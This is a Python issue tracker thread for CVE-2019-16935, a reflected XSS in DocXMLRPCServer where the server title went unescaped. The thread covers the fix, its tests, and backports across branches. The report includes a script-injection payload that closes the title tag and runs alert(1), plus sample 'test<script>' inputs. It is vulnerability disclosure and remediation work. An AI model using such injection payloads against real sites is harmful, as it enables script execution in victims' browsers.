1.Lib/DocXMLRPCServer.py is “a documenting XML-RPC Server“,In the Class ServerHTMLDoc, method markup(), will escape the Special symbols to safe(such as <," etc).
2.But it only escape the content from server.set\_server\_name() and server.set\_server\_documentation(),the "title" content from the server.set\_server\_title() will not be escaped, so if I set\_server\_title('123</title><script>alert(1)</script>'), it will cause XSS because not escaped.
3.I see the alert in Chrome by visiting http://127.0.0.1,the Poc is the poc.py（run in python2.7） in attachments.
4.Problems seems to be at
https://github.com/python/cpython/blob/master/Lib/xmlrpc/server.py#L897 "return documenter.page(self.server\_title,documentation)".Before this line,variable "documentation" has been escaped but self.server\_title not.This is the main cause.

msg352922 - (view)

Author: Karthikeyan Singaravelan (xtreak) \* 

Date: 2019-09-21 04:25

Thanks for the report. There is a policy to report security vulnerabilities in CPython : https://www.python.org/news/security/.

msg353132 - (view)

Author: Dong-hee Na (corona10) \* 

Date: 2019-09-25 02:08

Looks like this issue can be solved by below code changed.

@@ -833,7 +834,7 @@ class XMLRPCDocGenerator:
     def set\_server\_title(self, server\_title):
         """Set the HTML title of the generated server documentation"""

-        self.server\_title = server\_title
+        self.server\_title = html.escape(server\_title)

msg353140 - (view)

Author: Dong-hee Na (corona10) \* 

Date: 2019-09-25 04:40

I've proposed the patch on GitHub which escaping the server\_title when the documenter.page is called. (It different point with msg353132.

msg353169 - (view)

Author: STINNER Victor (vstinner) \* 

Date: 2019-09-25 11:00

\> Thanks for the report. There is a policy to report security vulnerabilities in CPython : https://www.python.org/news/security/.

The private security mailing list has been contacted first and we advice to open a public issue since we consider that it's not a major security issue.

To exploit this bug, the attacker has to control the XML-RPC server title.

msg353170 - (view)

Author: STINNER Victor (vstinner) \* 

Date: 2019-09-25 11:01

\> I've proposed the patch on GitHub which escaping the server\_title when the documenter.page is called. (It different point with msg353132.

The attached poc.py seems to show that server name and server documentation are not escaped neither.

server.set\_server\_name('test<script>')
server.set\_server\_documentation('test<script>')

Well, please write a test to check that ;-)

msg353301 - (view)

Author: Dong-hee Na (corona10) \* 

Date: 2019-09-26 13:17

@vstinner

Thank you for the feedback.
I've updated the PR with the unit test you suggested :-)

msg353395 - (view)

Author: STINNER Victor (vstinner) \* 

Date: 2019-09-27 19:59

New changeset e8650a4f8c7fb76f570d4ca9c1fbe44e91c8dfaa by Victor Stinner (Dong-hee Na) in branch 'master':
bpo-38243, xmlrpc.server: Escape the server\_title (GH-16373)
https://github.com/python/cpython/commit/e8650a4f8c7fb76f570d4ca9c1fbe44e91c8dfaa

msg353403 - (view)

Author: miss-islington (miss-islington)

Date: 2019-09-27 20:18

New changeset 39a0c7555530e31c6941a78da19b6a5b61170687 by Miss Islington (bot) in branch '3.7':
bpo-38243, xmlrpc.server: Escape the server\_title (GH-16373)
https://github.com/python/cpython/commit/39a0c7555530e31c6941a78da19b6a5b61170687

msg353404 - (view)

Author: miss-islington (miss-islington)

Date: 2019-09-27 20:19

New changeset 6447b9f9bd27e1f6b04cef674dd3a7ab27bf4f28 by Miss Islington (bot) in branch '3.8':
bpo-38243, xmlrpc.server: Escape the server\_title (GH-16373)
https://github.com/python/cpython/commit/6447b9f9bd27e1f6b04cef674dd3a7ab27bf4f28

msg353407 - (view)

Author: STINNER Victor (vstinner) \* 

Date: 2019-09-27 20:27

@Dong-hee Na: Would you mind to try to backport the change to Python 2.7 which also has the bug?

msg353418 - (view)

Author: Dong-hee Na (corona10) \* 

Date: 2019-09-27 21:49

Sure!

msg353440 - (view)

Author: Ned Deily (ned.deily) \* 

Date: 2019-09-28 07:33

New changeset 1698cacfb924d1df452e78d11a4bf81ae7777389 by Ned Deily (Victor Stinner) in branch '3.6':
bpo-38243, xmlrpc.server: Escape the server\_title (GH-16373) (GH-16441)
https://github.com/python/cpython/commit/1698cacfb924d1df452e78d11a4bf81ae7777389

msg353668 - (view)

Author: STINNER Victor (vstinner) \* 

Date: 2019-10-01 10:58

New changeset 8eb64155ff26823542ccf0225b3d57b6ae36ea89 by Victor Stinner (Dong-hee Na) in branch '2.7':
\[2.7\] bpo-38243: Escape the server title of DocXMLRPCServer (GH-16447)
https://github.com/python/cpython/commit/8eb64155ff26823542ccf0225b3d57b6ae36ea89

msg353677 - (view)

Author: STINNER Victor (vstinner) \* 

Date: 2019-10-01 11:51

I prefer to keep it open until the 3.5 backport is merged.

msg353689 - (view)

Author: Dong-hee Na (corona10) \* 

Date: 2019-10-01 12:21

\> I prefer to keep it open until the 3.5 backport is merged.
Sorry, I didn't find it.
Yes, we should let it open until the PR is merged.

msg355614 - (view)

Author: Larry Hastings (larry) \* 

Date: 2019-10-29 05:40

New changeset 3fe1b19265b55c290fc956e9aafcf661803782de by larryhastings (Victor Stinner) in branch '3.5':
bpo-38243, xmlrpc.server: Escape the server\_title (GH-16373) (GH-16441) (#16516)
https://github.com/python/cpython/commit/3fe1b19265b55c290fc956e9aafcf661803782de

msg361819 - (view)

Author: STINNER Victor (vstinner) \* 

Date: 2020-02-11 14:36

CVE-2019-16935 has been assigned to this vulnerability.

msg364855 - (view)

Author: STINNER Victor (vstinner) \* 

Date: 2020-03-23 14:58

Charalampos Strataris's advice: If you backport the security fix and test\_docxmlrpc starts to hang randomly, you should also backport bpo-27614 fix. For example, it's the commit 3911d8333c5b6f9374fa11ab7c912f1471580f0f for Python 2.7. We had the issue on RHEL 7.

History

Date

User

Action

Args

2022-04-11 14:59:20

admin

set

github: 82424

2020-03-23 14:58:02

vstinner

set

messages: + msg364855

2020-02-11 14:36:14

vstinner

set

messages: + msg361819  
title: A reflected XSS in python/Lib/DocXMLRPCServer.py -> \[security\]\[CVE-2019-16935\] A reflected XSS in python/Lib/DocXMLRPCServer.py

2019-10-29 05:43:00

larry

set

status: open -> closed  
resolution: fixed

2019-10-29 05:40:18

larry

set

nosy: + larry  
messages: + msg355614  

2019-10-01 12:21:52

corona10

set

messages: + msg353689

2019-10-01 11:51:17

vstinner

set

status: closed -> open  
resolution: fixed -> (no value)  
messages: + msg353677  

2019-10-01 11:28:39

corona10

set

status: open -> closed  
resolution: fixed  
stage: patch review -> resolved

2019-10-01 10:59:41

vstinner

set

pull\_requests: + pull\_request16106

2019-10-01 10:58:04

vstinner

set

messages: + msg353668

2019-09-28 07:33:05

ned.deily

set

nosy: + ned.deily  
messages: + msg353440  

2019-09-28 01:20:27

corona10

set

pull\_requests: + pull\_request16026

2019-09-27 21:49:22

corona10

set

messages: + msg353418

2019-09-27 20:27:01

vstinner

set

messages: + msg353407

2019-09-27 20:19:44

miss-islington

set

messages: + msg353404

2019-09-27 20:18:19

miss-islington

set

nosy: + miss-islington  
messages: + msg353403  

2019-09-27 20:03:20

vstinner

set

pull\_requests: + pull\_request16020

2019-09-27 20:00:25

miss-islington

set

pull\_requests: + pull\_request16019

2019-09-27 20:00:15

miss-islington

set

pull\_requests: + pull\_request16018

2019-09-27 19:59:40

vstinner

set

messages: + msg353395

2019-09-26 13:17:38

corona10

set

messages: + msg353301

2019-09-25 11:01:41

vstinner

set

messages: + msg353170

2019-09-25 11:00:43

vstinner

set

messages: + msg353169

2019-09-25 04:40:29

corona10

set

messages: + msg353140

2019-09-25 04:23:41

corona10

set

keywords: + patch  
stage: patch review  
pull\_requests: + pull\_request15953

2019-09-25 02:08:49

corona10

set

messages: + msg353132

2019-09-25 01:43:44

corona10

set

nosy: + corona10  

2019-09-25 01:10:13

vstinner

set

nosy: + vstinner, mdk  

2019-09-21 19:34:38

ned.deily

set

keywords: + security\_issue  
priority: normal -> high  
versions: + Python 2.7, Python 3.5, Python 3.6, Python 3.8, Python 3.9

2019-09-21 04:25:04

xtreak

set

nosy: + xtreak  
messages: + msg352922  

2019-09-21 02:17:30

longwenzhang

create

Tag

#chrome